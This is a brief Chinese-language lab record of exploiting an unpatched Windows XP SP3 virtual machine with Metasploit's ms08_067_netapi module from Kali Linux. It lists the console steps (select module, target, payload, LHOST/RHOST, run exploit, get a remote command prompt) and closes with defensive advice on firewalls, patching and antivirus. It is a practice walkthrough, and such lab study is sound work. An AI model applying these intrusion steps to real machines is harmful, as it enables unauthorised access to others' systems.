Kali linux 實做記錄

一、環境：

Victim：WinXP SP3，no hotfix、no firewall、no Antivirus（192.168.203.128）
　　KALI linux：Metasploit（192.168.203.129）
二、打開Mfsconsole

三、show exploits
　　help search
　　info exploit/windows/smb/ms08_067_netapi
四、use exploit/windows/smb/ms08_067_netapi  （選取一個漏洞來用）

五、show targets → set tartgets（設定目標作業系統）

六、show payloads

七、pick a payloads & set payload

八、Set LHOST & RHOST（設定IP）

九、show options（查看參數設定）

十、Exploit

　　進入目標命令提示字元

十一、Windows XP：netstat -an

十二、結論：
　　勿將預設開啟的防火牆關閉
　　安裝hotfix，如果有的話
　　過時系統該換就換
　　安裝防毒軟體
　　入侵有漏洞系統不難，只要照著SOP做即可